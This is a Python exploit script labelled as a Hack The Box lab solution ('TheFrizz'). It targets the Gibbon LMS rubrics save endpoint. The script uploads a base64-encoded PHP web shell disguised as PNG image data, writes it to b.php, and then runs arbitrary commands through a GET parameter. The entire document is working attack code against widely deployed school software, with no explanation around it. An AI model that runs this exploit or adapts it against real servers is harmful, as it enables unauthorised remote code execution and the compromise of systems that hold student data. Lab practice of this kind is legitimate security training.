HTB: TheFrizz

exploit.py

import requests
import sys
import base64

TARGET = "http://frizzdc.frizz.htb"
UPLOAD_PATH = "/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php"
SHELL_PATH = "/Gibbon-LMS/b.php"

def generate_payload(cmd_param):
    php_payload = f"<?=`{cmd_param}`?>"
    base64_payload = base64.b64encode(php_payload.encode()).decode()
    return f"image/png;b,{base64_payload}"

def upload_shell():
    payload = generate_payload('$_GET[1]')
    multipart_data = {
        "img": payload,
        "gibbonPersonID": "000000001",
        "path": "b.php"
    }

    print("[*] Uploading shell...")
    r = requests.post(TARGET + UPLOAD_PATH, data=multipart_data)
    if r.status_code == 200 and 'b.php' in r.text :
        print("[+] Shell uploaded.")
    else:
        print(f"[!] Upload failed. HTTP {r.status_code}")
        sys.exit(1)

def trigger_shell(command):
    url = f"{TARGET}{SHELL_PATH}?1={command}"
    print(f"[*] Triggering shell: {url}")
    r = requests.get(url)
    if r.status_code == 200:
        print("[+] Response:\n\n" + r.text.strip())
    else:
        print(f"[!] Shell execution failed. HTTP {r.status_code}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <command>")
        sys.exit(1)

    command = sys.argv[1]
    upload_shell()
    trigger_shell(command)